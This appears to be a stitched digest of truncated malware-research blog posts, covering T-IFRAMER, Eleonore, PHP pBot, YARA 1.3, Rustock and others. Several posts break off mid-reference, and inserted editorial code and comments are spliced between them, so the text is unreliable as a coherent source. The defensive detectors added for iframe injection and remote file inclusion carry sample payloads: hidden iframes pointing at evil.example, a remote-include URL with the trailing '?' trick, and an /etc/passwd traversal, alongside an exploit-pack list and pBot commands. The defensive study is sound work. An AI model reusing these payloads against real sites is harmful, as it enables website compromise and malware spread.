

"Vosate Nofooz" - an almost unknown iranian malware [ part 1 ]

After taking a closer look at this malware, I decided to write up something useful about a family that is still almost unknown.
Here "unknown" does not mean dangerous or high-risk.
The malware is not as dangerous as people think; what makes it a problem is the cleaning phase.
Its payload does little damage, but it is robust in the area of self-defense.

T-IFRAMER. Kit for the injection of malware In-the-Wild


T-IFRAMER is a kit that lets an attacker automate, centralize and manage over HTTP the spread of malicious code, injecting iframe tags into compromised websites and using the resulting infections to feed a botnet. The original post includes a screen capture of the authentication page.

It is therefore a fairly complex kit that lets criminals manage the spread of malware over HTTP through drive-by-download and drive-by-injection attacks, inserting iframe tags into compromised web pages.

It has four main modules: Stats, Manager, Iframes and Injector, each built to optimize the spread of malware.

The first (Stats) manages the compromised FTP accounts, giving control over them, including the ability to upload files. This is where one of the propagation cycles of the malicious code begins.
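The injected iframes such a kit plants are built to be invisible to the visitor: zero or one pixel in size, hidden by CSS, or positioned off-screen, and pointing at a host the site owner never embedded. The following is an added example of a scanner for that pattern, written here for this page and not part of T-IFRAMER or of the original post; the HTML page and the hostnames in it are constructed for the demonstration, and the size and offset thresholds are assumptions a practitioner would tune.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (hypothetical hosts): one legitimate embed plus two
# iframes of the kind a kit like this injects into a compromised site.
SAMPLE_HTML = """<html><body>
<h1>Welcome to our shop</h1>
<iframe src="https://www.youtube.com/embed/demo" width="560" height="315"></iframe>
<p>Footer</p>
<iframe src="http://evil.example/in.php" width="0" height="0" style="visibility: hidden"></iframe>
<iframe src=http://evil.example/x.php style="position:absolute;left:-5000px;top:-5000px"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attrs is a list of (name, value); value is None for bare attributes
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _px(value):
    """Parse a width/height attribute into an int, or None if absent/non-numeric."""
    m = re.match(r"\s*(-?\d+)", value or "")
    return int(m.group(1)) if m else None


def suspicious_reasons(attrs, allowed_hosts):
    """Heuristics for an iframe meant to be invisible to the visitor (thresholds are assumptions)."""
    reasons = []
    width, height = _px(attrs.get("width")), _px(attrs.get("height"))
    if width is not None and width <= 1:
        reasons.append("width<=1")
    if height is not None and height <= 1:
        reasons.append("height<=1")
    style = attrs.get("style", "").lower().replace(" ", "")
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden by css")
    for prop, offset in re.findall(r"(left|top):(-\d+)px", style):
        if int(offset) <= -100:
            reasons.append(f"{prop} pushed off-screen ({offset}px)")
    host = urlparse(attrs.get("src", "")).hostname or ""
    if allowed_hosts and host and host not in allowed_hosts:
        reasons.append(f"third-party host {host}")
    return reasons


def find_injected_iframes(html, allowed_hosts=()):
    """Return (src, reasons) for each iframe that trips at least one heuristic.
    allowed_hosts lists the embed hosts the site legitimately uses; when empty
    the third-party check is skipped."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for attrs in parser.iframes:
        reasons = suspicious_reasons(attrs, allowed_hosts)
        if reasons:
            hits.append((attrs.get("src", ""), reasons))
    return hits


if __name__ == "__main__":
    for src, why in find_injected_iframes(SAMPLE_HTML, allowed_hosts=("www.youtube.com",)):
        print(src, "->", ", ".join(why))
```

Run against a site's pages after a suspected compromise, the two evil.example frames are reported with every heuristic they trip, while the legitimate embed stays silent; in practice the check is most useful when run repeatedly, diffing against the last known-clean crawl.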

Malware analyzer under Windows


Do you want to analyze malware but are tired of complicated environments where you almost have to be a computer engineer to get them working, and whose hardware requirements exceed what your computer has? Then the solution is Buster Sandbox Analyzer.

Buster Sandbox Analyzer runs under Windows and uses Sandboxie as the environment in which the malware is executed.

A default installation of Sandboxie, which takes less than a minute, is enough to start working with Buster Sandbox Analyzer.

Ether Automation Utility: Ether Bunny

Ether Bunny is a script that I use to automatically start up and run Xen domains, copy files into them, and then execute those files with Ether. It is a quick hack I put together. Most of the variables at the top of the file will need to be changed to match your configuration. This script is made available as-is; if it doesn't work you'll need to debug it on your own. That being said, if you find it useful and modify it, let me know and I'll be happy to update the public version.

You'll need to get a copy of Winexe as well to run the files remotely. There are some setup instructions on the Winexe page that will help you configure your host machine.

Here's how I use it:

snoosnoo:/xen# ./ malware.exe
Ether Bunny v0.1 by Danny Quist

Analyzing malware.exe to on VM
Destroying old vm image /xen/winxp-sp2-malware-instance/
Restoring vm image...
Starting vm from /etc/xen/ramdisk-winxp-sp2.cfg
Copying malware.exe to VM 1166 at
Attempt: 1
Running malware.exe on VM winxp-sp2-ramdisk (1166)
Letting program run...
dos charset 'CP850' unavailable - using ASCII
EPOLL_CTL_ADD failed (Operation not permitted) - falling back to select()
Killing ether.
Destroying VM ID: 1166

Download Ether Bunny here.


Edit Jan 18 2011: The Winexe site seems to have disappeared, so I have linked to my local compiled copy.

ZeuS and power Botnet zombie recruitment


As I have said on several occasions, ZeuS is one of the most "media-friendly" botnets (hence one of the best known and most popular), one of the most aggressive, and the one whose criminal activity has the most advanced functions: phishing attacks, real-time monitoring of the zombies, and collection of all that information over different protocols.

[Crimeware] Researches and Reversing about Eleonore Exploit Pack


Today we will see how Eleonore Exploit Pack works, directly from an infected website.

Essentially, Eleonore Exploit Pack is a collection of exploits and statistics collectors; this is the 'marketing' presentation of the pack:

I present the new, current Russian exploit pack "Eleonore Exp v1.2"

Exploits on pack:
> MS009-02
> Telnet - Opera
> Font tags - FireFox
> PDF collab.getIcon
> PDF Util.Printf
> PDF collab.collectEmailInfo
> DirectX DirectShow
> Spreadsheet

PHP pBot Dissection

Today I'll dissect a website infected with PHP:Pbot-A (Avast naming convention).

Be careful: the link reported is still alive!

This infected URL emerged from a malicious-domains DB:

As you can see, it looks like a plain .txt file, but this is classic evidence of an RFI infection: the bot source is hosted as text on a remote server and pulled in through a vulnerable include() on the victim site.

MD5 : da67134fc6953201d3556f5fedbcd50d

* #crew@corp. since 2003
* edited by: devil__ and MEIAFASE
* Friend: LP
* .user //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
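The web server of the victim site keeps the evidence of how such a .txt payload got included: a request whose parameter value is a full URL (often ending in "?" so that whatever the script appends becomes a query string). The following is an added example of a detector for that pattern over Apache access logs, written for this page rather than taken from the post or from pBot; the log lines, addresses and hostnames are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed Apache combined-format log lines (hypothetical addresses and hosts).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2011:12:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2011:12:00:02 +0000] "GET /index.php?page=http://evil.example/bot.txt? HTTP/1.1" 200 1024 "-" "libwww-perl/5.8"
198.51.100.7 - - [10/Jan/2011:12:00:03 +0000] "GET /modules.php?name=https%3A%2F%2Fevil.example%2Fpbot.txt%3F HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Jan/2011:12:00:04 +0000] "GET /gallery.php?img=../../etc/passwd HTTP/1.1" 404 200 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Stream wrappers PHP accepts in include()/require() when allow_url_include is
# on. The trailing "?" in the payload URL is the classic trick that turns any
# suffix the vulnerable script appends (e.g. ".php") into a harmless query string.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")


def rfi_parameters(request_path):
    """Return (name, value) pairs whose URL-decoded value points at a remote stream wrapper."""
    query = urlparse(request_path).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.strip().lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def scan_log(text):
    """Return one finding per request that carries an RFI-style parameter.
    Local traversal (../../etc/passwd) is deliberately out of scope here."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = rfi_parameters(m.group("path"))
        if not hits:
            continue
        status = int(m.group("status"))
        findings.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "path": m.group("path"),
            "status": status,
            "params": hits,
            # a 2xx means the vulnerable script ran, so the include may have succeeded
            "likely_executed": 200 <= status < 300,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["params"], "executed" if f["likely_executed"] else "")
```

The two remote-include requests are reported with the decoded payload URL; the 2xx status on both is what makes them worth following up, since it means the including script completed. Parameters are decoded before matching so that the percent-encoded variant in the third line is caught as well.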

YARA 1.3 released

I'm glad to announce a new version of YARA which includes three new major features, some of them inspired by requests and suggestions of some users out there. They are:

* C-style includes. Now you can include a YARA source file into another just like you do in your C programs with the #include pre-processor directive.

* Metadata in rules. Rules can now carry associated metadata as identifier/value pairs. Metadata values can be strings, integers or booleans, and can be read later from the yara-python extension.

* Multi-source compilation in yara-python. A group of YARA source files can be compiled together in yara-python. In this way rules from different sources can be matched at the same time against your data, which is more efficient than compiling and matching each source independently.

Here is an example of the "include" and "metadata" features:

include "./includes/some_other_rules.yar"

rule silent_banker : banker
{
    meta:
        description = "This is just an example"
        thread_level = 3
        in_the_wild = true

    strings:
        $a = {6A 40 68 00 30 00 00 6A 14 8D 91}
        $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
        // $c was lost in extraction; this value is taken from the YARA
        // documentation's version of the same example rule
        $c = "UVODFRYSIHLNWPEJXQZAKCBGMT"

    condition:
        $a or $b or $c
}
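From yara-python the rule above would be loaded with yara.compile(filepath=...) (or, with the new multi-source feature, yara.compile(filepaths={"ns1": "a.yar", "ns2": "b.yar"})) and its metadata read from each Match's meta attribute. To make the hex-string semantics concrete without the extension installed, the following is an added pure-Python reference matcher for the two hex strings $a and $b and the rule's "any string" condition; it is written for this page and is not yara or yara-python. It also accepts ?? wildcard bytes, which the rule above does not use, and the byte buffer it scans is constructed for the demonstration.

```python
import re

# The two hex strings and the metadata of the silent_banker rule above,
# transcribed by hand; the condition is "any of the strings matches".
SILENT_BANKER = {
    "name": "silent_banker",
    "tags": ["banker"],
    "meta": {"description": "This is just an example", "thread_level": 3, "in_the_wild": True},
    "strings": {
        "$a": "{6A 40 68 00 30 00 00 6A 14 8D 91}",
        "$b": "{8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}",
    },
}


def parse_hex_pattern(pattern):
    """Turn a YARA hex string such as {6A 40 ?? 8D} into a list of byte
    values, with None standing for a ?? wildcard byte."""
    body = pattern.strip()
    if not (body.startswith("{") and body.endswith("}")):
        raise ValueError("hex string must be wrapped in { }")
    needle = []
    for tok in body[1:-1].split():
        if tok == "??":
            needle.append(None)
        elif re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            needle.append(int(tok, 16))
        else:
            raise ValueError(f"unsupported token {tok!r} (jumps and nibble wildcards not handled here)")
    return needle


def find_pattern(data, pattern):
    """Every offset in data at which the hex pattern occurs (naive scan)."""
    needle = parse_hex_pattern(pattern)
    n = len(needle)
    offsets = []
    for i in range(len(data) - n + 1):
        if all(b is None or data[i + j] == b for j, b in enumerate(needle)):
            offsets.append(i)
    return offsets


def match_rule(rule, data):
    """Evaluate the rule against data. Returns a dict shaped like a
    yara-python Match (rule, tags, meta, strings) or None when nothing hits."""
    found = {}
    for ident, pat in rule["strings"].items():
        offs = find_pattern(data, pat)
        if offs:
            found[ident] = offs
    if not found:
        return None
    return {"rule": rule["name"], "tags": rule["tags"], "meta": rule["meta"], "strings": found}


# Constructed sample buffer (not a real binary): NOP padding, the bytes of $a,
# then INT3 padding, so $a should hit at offset 16 and $b not at all.
SAMPLE = b"\x90" * 16 + bytes.fromhex("6A 40 68 00 30 00 00 6A 14 8D 91") + b"\xCC" * 8

if __name__ == "__main__":
    m = match_rule(SILENT_BANKER, SAMPLE)
    print(m["rule"], m["tags"], m["meta"], m["strings"])
```

The point of the metadata feature is visible in match_rule's return value: the description, thread_level and in_the_wild fields travel with the match, so a tool consuming many rules can triage hits without parsing the rule text. The real engine replaces the naive byte scan with a multi-pattern search, but the result shape is the same.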

For more info:

Swimming into Trojan and Rootkit GameThief Win32 Magania Hostile Code


Here my last paper.


Trojan-GameThief.Win32.Magania (Kaspersky naming convention) monitors user activity to obtain valuable information from the affected user, especially gaming login credentials. This long tutorial analyzes that malware, but it is also a general document explaining how to analyze modern nested-doll malware.

Giuseppe 'Evilcry' Bonfa'

W32/Rustock.F, a quite unknown Rustock.C dropper

Some days ago a friend of mine sent me a suspicious file; unfortunately I couldn't look at it until last night because I was away for work.

Submitting the file for scanning showed that only 39.02% of the antivirus engines recognize it as malware (some popular ones, such as Kaspersky or Symantec, don't). Microsoft calls it "TrojanDropper:Win32/Rustock.F", while for Panda it is "Trj/Rustock.L".

The analysis shows that it is really a dropper for the well-known Rustock.C.

A lot has already been written about Rustock.C, so I will analyze only this dropper, to show that it is malware even when your antivirus does not flag it.

The file I'm talking about is called "is7771.exe".

In the article I explain the behaviour of the dropper in detail; take a look at it here:
